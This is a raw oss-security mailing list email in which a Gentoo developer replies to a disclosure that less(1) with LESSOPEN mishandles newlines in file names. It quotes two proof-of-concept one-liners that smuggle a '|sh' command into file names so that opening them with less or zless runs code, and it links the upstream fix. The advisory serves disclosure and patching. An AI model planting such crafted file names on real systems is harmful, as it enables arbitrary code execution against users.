Received: by 2002:ab2:7041:0:b0:1f4:bcc8:f211 with SMTP id x1csp231970lql; Fri, 12 Apr 2024 08:46:04 -0700 (PDT) X-Forwarded-Encrypted: i=2; AJvYcCXtrKPfJetilQMQgnC34vqXVu1VJsPkLVxpsN20iSDk3F4k92GmVs5pYIadUSvWI75zm2lWcMOqggS/SlNI+B+mbIJfq4oPWUv8+nGPLQ== X-Google-Smtp-Source: AGHT+IG9vuagC536VNAurO2F/bsSYWzYxj0XLLtbEEC1kXOickgp3ng3glG7ItXkrKVUbTBykTmF X-Received: by 2002:a81:b347:0:b0:617:d49f:d5b9 with SMTP id r68-20020a81b347000000b00617d49fd5b9mr2676170ywh.14.1712936764536; Fri, 12 Apr 2024 08:46:04 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1712936764; cv=none; d=google.com; s=arc-20160816; b=L5ih0CS5tg/5IXyvS54X2snmc6QWwJKyOY1xiytEUHWRmOhoaX3enP9T5n5KBJP8n9 g468BxznmddeF0C26LJO6mGTy81nTNcpfoui6KK0nQuGiT7CsDD6qxKKroSMwP6IeR5C jW3lUoCaIufDEMS1/7+2558w5vYIqpbdhz9kHHfE937DgXd5410JPkWkIVpTJkmRpX/6 0tyt2P9my6a5T1HnMYdG4uPYoxRlmVY78UDiW/4IHyBuXPKV7/uv6f4rlhCeEr5nHJet fe4KbGBCrtb/mu9kzSP7SORu3dJMJpOSNehX28ITttmPTXFKmBm/UTIwBTYS0eYMz9xi PLIw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=subject:mime-version:message-id:date:user-agent:references :organization:in-reply-to:to:from:delivered-to:delivered-to:reply-to :list-id:list-subscribe:list-unsubscribe:list-help:list-post :precedence:mailing-list; bh=Mop0NH8ZpDR6UB2Iz/zM/ogqZEGHNNOcPWSulTTCR4E=; fh=9jsPTyo6edd9xvAeG+KFFrRrXMmgB/RdwUKOrvy9dcA=; b=FAYUyAGIt3vquxliD6BFKSKpV0Q91OucJqMADVg/2prregC/F+6WnwiuyCx/uJO++Y ycDiruHdMj3xI0gMQW3+FOemolxSVG1dX8iIpSg7ZqkY5D7XrFAJaTlv6cKQBI05jnLq yw67RQ6ZaOgRxDoMdpAKnbT8euege9xXT2C+HOOSvkFnUaODweiOdvf2aKEWPQDd232P DtvgIDTQ9XvZ0ThFQ94LtaM9pUjx/Mo931bPt2eY+V6Bqwuzka5uj6qj2YMTsKxuQhKO XyGOpH+HuGx1DoCOSKUNYSWbfWsiAmtYgcfXFHyDkLOT1+V2tHo3Gza21aTuKwq4+5lK lL4A==; dara=google.com ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of oss-security-return-30017-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30017-linux.lists.archive=gmail.com@lists.openwall.com"; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=gentoo.org Return-Path: Received: from second.openwall.net (second.openwall.net. [193.110.157.125]) by mx.google.com with SMTP id q12-20020a056214194c00b0069676318c3asi4360750qvk.62.2024.04.12.08.46.03 for ; Fri, 12 Apr 2024 08:46:04 -0700 (PDT) Received-SPF: pass (google.com: domain of oss-security-return-30017-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) client-ip=193.110.157.125; Authentication-Results: mx.google.com; spf=pass (google.com: domain of oss-security-return-30017-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30017-linux.lists.archive=gmail.com@lists.openwall.com"; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=gentoo.org Received: (qmail 18331 invoked by uid 550); 12 Apr 2024 15:45:40 -0000 Mailing-List: contact oss-security-help@lists.openwall.com; run by ezmlm Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-ID: Reply-To: oss-security@lists.openwall.com Delivered-To: mailing list oss-security@lists.openwall.com Delivered-To: moderator for oss-security@lists.openwall.com Received: (qmail 31890 invoked from network); 12 Apr 2024 12:42:23 -0000 From: Sam James To: oss-security@lists.openwall.com In-Reply-To: <20240412122031.pt2sx6rasca3mgpu@jwilk.net> (Jakub Wilk's message of "Fri, 12 Apr 2024 14:20:31 +0200") Organization: Gentoo References: <20240412122031.pt2sx6rasca3mgpu@jwilk.net> User-Agent: mu4e 1.12.3; emacs 30.0.50 Date: Fri, 12 Apr 2024 13:42:05 +0100 Message-ID: <87frvqvjky.fsf@gentoo.org> MIME-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha512; protocol="application/pgp-signature" Subject: Re: [oss-security] less(1) with LESSOPEN mishandles \n in paths --=-=-= Content-Type: text/plain Jakub Wilk writes: > less(1) does not correctly escape newlines in pathnames when > constructing command line of the input preprocessor. If a user ran > less(1) on files with untrusted names, this could result in execution > of arbitrary code. > > The input preprocessor is enabled by the LESSOPEN environment variable. > But if you didn't set it, don't worry, because zless(1) (or xzless(1), > or zstdless(1)) sets it for you: > > $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')" > $ zless ./* > _______ > < pwned > > ------- > \ ^__^ > \ (oo)\_______ > (__)\ )\/\ > ||----w | > || || > ./ > |sh (file 1 of 2) (END) - Next: ./\ > > On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the > bug can be exploited even without the wrapper: > Unfortunately, it looks like we're the same in Gentoo. > $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo > $ less ./*/* > _______ > < pwned > > ------- > \ ^__^ > \ (oo)\_______ > (__)\ )\/\ > ||----w | > || || > ./ > |m/oo (file 1 of 2) (END) - Next: ./m/oo > > > Upstream fix: > https://github.com/gwsw/less/commit/007521ac3c95bc76 Thanks. Any idea if upstream plan to backport it? It doesn't apply cleanly I think to the last release 643 (653 is a beta) but I'll try do it now. --=-=-= Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- iOUEARYKAI0WIQQlpruI3Zt2TGtVQcJzhAn1IN+RkAUCZhksHl8UgAAAAAAuAChp c3N1ZXItZnByQG5vdGF0aW9ucy5vcGVucGdwLmZpZnRoaG9yc2VtYW4ubmV0MjVB NkJCODhERDlCNzY0QzZCNTU0MUMyNzM4NDA5RjUyMERGOTE5MA8cc2FtQGdlbnRv by5vcmcACgkQc4QJ9SDfkZBlLgD9E/Up0KBsCb///qqZluDTTOGw546saP3JnC/Q kyTe/OkA/0NDUknaG+GTIBXdiZhxZy9WnIBjYy157uf/8f9m/pcO =o3er -----END PGP SIGNATURE----- --=-=-=--